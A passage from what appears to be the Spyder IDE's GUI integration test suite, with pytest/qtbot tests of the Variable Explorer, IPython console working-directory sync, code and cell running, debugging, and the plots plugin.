# --- Assert runfile text is present after reruns ---
assert 'runfile' in control.toPlainText()
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_connection_to_external_kernel(main_window, qtbot):
"""Test that only Spyder kernels are connected to the Variable Explorer."""
# Test with a generic kernel
km, kc = start_new_kernel()
main_window.ipyconsole._create_client_for_kernel(kc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that there are no variables in the variable explorer
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 0
# Test with a kernel from Spyder
spykm, spykc = start_new_kernel(spykernel=True)
main_window.ipyconsole._create_client_for_kernel(spykc.connection_file, None,
None, None)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert that a variable is visible in the variable explorer
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 1
# Shutdown the kernels
spykm.stop_restarter()
km.stop_restarter()
spykm.shutdown_kernel(now=True)
km.shutdown_kernel(now=True)
spykc.stop_channels()
kc.stop_channels()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
"""Test that variable types can't be changed in the Variable Explorer."""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Try to change types
qtbot.keyClicks(QApplication.focusWidget(), "'s'")
qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
qtbot.wait(1000)
# Assert object remains the same
assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and File Explorer when
changing cwd in the IPython console.
"""
wdir = main_window.workingdirectory
treewidget = main_window.explorer.fileexplorer.treewidget
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp dir
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in IPython console using %cd
with qtbot.waitSignal(shell.executed):
shell.execute(u"%cd {}".format(temp_dir))
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in explorer
assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
temp_dir)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
"""
Test synchronization with working directory and IPython console when
changing directories in the File Explorer.
"""
wdir = main_window.workingdirectory
explorer = main_window.explorer
shell = main_window.ipyconsole.get_current_shellwidget()
# Wait until the window is fully up
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Create temp directory
temp_dir = to_text_string(tmpdir.mkdir(test_directory))
# Change directory in the explorer widget
explorer.chdir(temp_dir)
qtbot.wait(1000)
# Assert that cwd changed in workingdirectory
assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
temp_dir)
# Assert that cwd changed in IPython console
assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(os.name == 'nt' or sys.platform == 'darwin' or
LooseVersion(ipy_release.version) == LooseVersion('7.11.0')),
reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
"""Test all the different ways we have to run Cython code"""
# ---- Setup ----
# Get a reference to the code editor widget
code_editor = main_window.editor.get_focus_widget()
# ---- Run pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until an object appears
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
assert shell.get_value('a') == 3628800
# Reset and close file
reset_run_code(qtbot, shell, code_editor, nsb)
main_window.editor.close_file()
# ---- Import pyx file ----
# Load test file
main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))
# Run file
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=COMPILE_AND_EVAL_TIMEOUT)
# Verify result
assert shell.get_value('b') == 3628800
# Close file
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that notebooks are open from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty notebook in the project dir
nb = osp.join(LOCATION, 'notebook.ipynb')
shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select notebook in the project explorer
idx = projects.explorer.treewidget.get_index('notebook.ipynb')
projects.explorer.treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that the notebook was opened
assert 'notebook.ipynb' in editorstack.get_current_filename()
# Convert notebook to a Python file
projects.explorer.treewidget.convert_notebook(osp.join(project_dir, 'notebook.ipynb'))
# Assert the converted script was opened
assert 'untitled' in editorstack.get_current_filename()
# Assert its contents are the expected ones
file_text = editorstack.get_current_editor().toPlainText()
if LooseVersion(nbconvert.__version__) >= LooseVersion('5.4.0'):
expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
'\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
else:
expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
assert file_text == expected_text
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that file are run from the Project explorer."""
projects = main_window.projects
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty file in the project dir
test_file = osp.join(LOCATION, 'script.py')
shutil.copy(test_file, osp.join(project_dir, 'script.py'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select file in the project explorer
idx = projects.explorer.treewidget.get_index('script.py')
projects.explorer.treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)
# Assert that the file was opened
assert 'script.py' in editorstack.get_current_filename()
# Run Python file
projects.explorer.treewidget.run([osp.join(project_dir, 'script.py')])
# Wait until the new console is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Wait until all objects have appeared in the variable explorer
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Check variables value
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
"""Test that new breakpoints are set in the IPython console."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that the breakpoint was set
shell.pdb_execute("b")
qtbot.wait(500)
assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run lines ----
# Run the whole file line by line
for _ in range(code_editor.blockCount()):
qtbot.keyClick(code_editor, Qt.Key_F9)
qtbot.wait(200)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell and advance ----
# Run the five cells present in file
# Add an unnamed cell at the top of the file
qtbot.keyClicks(code_editor, 'a = 10')
qtbot.keyClick(code_editor, Qt.Key_Return)
qtbot.keyClick(code_editor, Qt.Key_Up)
for _ in range(5):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the runcell function
assert 'runcell' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
control_text = shell._control.toPlainText()
# Rerun
shell.setFocus()
qtbot.keyClick(shell._control, Qt.Key_Up)
qtbot.wait(500)
qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
qtbot.wait(500)
code_editor.setFocus()
assert control_text != shell._control.toPlainText()
control_text = shell._control.toPlainText()[len(control_text):]
# Check for errors and the runcell function
assert 'runcell' in control_text
assert 'Error' not in control_text
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell ----
# Run the first cell in file
modifier = Qt.ControlModifier
if sys.platform == 'darwin':
modifier = Qt.MetaModifier
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
# Press Ctrl+Enter a second time to verify that we're *not* advancing
# to the next cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
assert nsb.editor.source_model.rowCount() == 1
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Debug cell ------
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClick(shell._control, 'c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Re-run last cell ----
# Run the first three cells in file
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
# Wait until objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
timeout=EVAL_TIMEOUT)
# Clean namespace
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
# Wait until there are no objects in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
timeout=EVAL_TIMEOUT)
# Re-run last cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
assert shell.get_value('li') == [1, 2, 3]
# ---- Closing test file ----
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
[{'spy_config': ('editor', 'run_cell_copy', True)}],
indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Make sure run_cell_copy is properly set
for editorstack in main_window.editor.editorstacks:
editorstack.set_run_cell_copy(True)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run cell and advance ----
# Run the three cells present in file
for _ in range(4):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the copied code
assert 'runcell' not in shell._control.toPlainText()
assert 'a = 10' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# ---- Closing test file and reset config ----
main_window.editor.close_file()
CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('CI', None) is None or PYQT5,
reason="It times out sometimes on Windows, it's not "
"meant to be run outside of a CI and it segfaults "
"too frequently in PyQt5")
def test_open_files_in_new_editor_window(main_window, qtbot):
"""
This tests that opening files in a new editor window
is working as expected.
Test for spyder-ide/spyder#4085.
"""
# Set a timer to manipulate the open dialog while it's running
QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
'script.py',
directory=LOCATION))
# Create a new editor window
# Note: editor.load() uses the current editorstack by default
main_window.editor.create_new_window()
main_window.editor.load()
# Perform the test
# Note: There's always one file open in the Editor
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
"""Test closing spyder when there is a file with modifications open."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
editorstack = main_window.editor.get_current_editorstack()
editor = editorstack.get_current_editor()
editor.document().setModified(True)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
"""Test that the maximize button is working correctly."""
# Set focus to the Editor
main_window.editor.get_focus_widget().setFocus()
# Click the maximize button
max_action = main_window.maximize_action
max_button = main_window.main_toolbar.widgetForAction(max_action)
qtbot.mouseClick(max_button, Qt.LeftButton)
# Verify that the Editor is maximized
assert main_window.editor._ismaximized
# Verify that the action minimizes the plugin too
qtbot.mouseClick(max_button, Qt.LeftButton)
assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif((os.name == 'nt' or
os.environ.get('CI', None) is not None and PYQT_VERSION >= '5.9'),
reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
"""
Test for a segfault when these steps are followed:
1. Open an object present in the Variable Explorer (e.g. a list).
2. Delete that object in its corresponding console while its
editor is still open.
3. Close that editor by pressing its *Ok* button.
"""
# Create the object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('myobj = [1, 2, 3]')
# Open editor associated with that object and get a reference to it
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']
# Move to the IPython console and delete that object
main_window.ipyconsole.get_focus_widget().setFocus()
with qtbot.waitSignal(shell.executed):
shell.execute('del myobj')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
# Close editor
ok_widget = obj_editor.btn_close
qtbot.mouseClick(ok_widget, Qt.LeftButton)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
"""
Test for errors when editing inline values in the Variable Explorer
and then moving to another plugin.
Note: Errors for this test don't appear to be related to it; instead,
they show up later on because they are generated by an async
C++ RuntimeError.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer._visibility_changed(True)
nsb = main_window.variableexplorer.get_focus_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Change focus to IPython console
main_window.ipyconsole.get_focus_widget().setFocus()
# Wait for the error
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
"""Test that c and n Pdb commands update the Variable Explorer."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that c works
qtbot.keyClicks(control, 'c')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 1)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Verify that n works
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 2)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Verify that it doesn't step into sitecustomize.py with next and that
# it stops the debugging session.
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 3)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: 'In [2]:' in control.toPlainText())
# Assert that the prompt appears
shell.clear_console()
assert 'In [2]:' in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
"""Test that we correctly stop a debugging session."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Move to the next line
shell.pdb_execute("n")
qtbot.wait(1000)
# Stop debugging
stop_debug_action = main_window.debug_toolbar_actions[5]
stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Assert there are only two ipdb prompts in the console
assert shell._control.toPlainText().count('ipdb') == 2
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
"""
Test that using the Working directory toolbar is working while debugging.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set LOCATION as cwd
main_window.workingdirectory.chdir(tempfile.gettempdir())
qtbot.wait(1000)
print(repr(control.toPlainText()))
shell.clear_console()
qtbot.wait(500)
# Get cwd in console
qtbot.keyClicks(control, '!import os; os.getcwd()')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Assert cwd is the right one
assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
"""Test that %varexp is working while debugging."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Get to an object that can be plotted
for _ in range(2):
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Generate the plot from the Variable Explorer
nsb.editor.plot('li', 'plot')
qtbot.wait(1000)
# Assert that there's a plot in the console
assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
"""
Test that plots generated in the IPython console are properly displayed
in the plots plugin.
"""
assert CONF.get('plots', 'mute_inline_plotting') is False
shell = main_window.ipyconsole.get_current_shellwidget()
figbrowser = main_window.plots.current_widget()
# Wait until the window is fully up.
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate a plot inline.
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig = plt.plot([1, 2, 3, 4], '.')\n"))
if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
else:
assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'
# Get the image name from the html, fetch the image from the shell, and
# save it as a png.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
ipython_qimg = shell._get_image(img_name)
ipython_qimg.save(ipython_figname)
# Save the image with the Plots plugin as a png.
plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
return_value=(plots_figname, '.png'))
figbrowser.save_figure()
assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
"""
Test that the option to set bbox_inches to 'tight' or 'None' is
working when plotting inline in the IPython console. By default, figures
are plotted inline with bbox_inches='tight'.
"""
tmpdir = to_text_string(tmpdir)
# Assert that the default is True.
assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
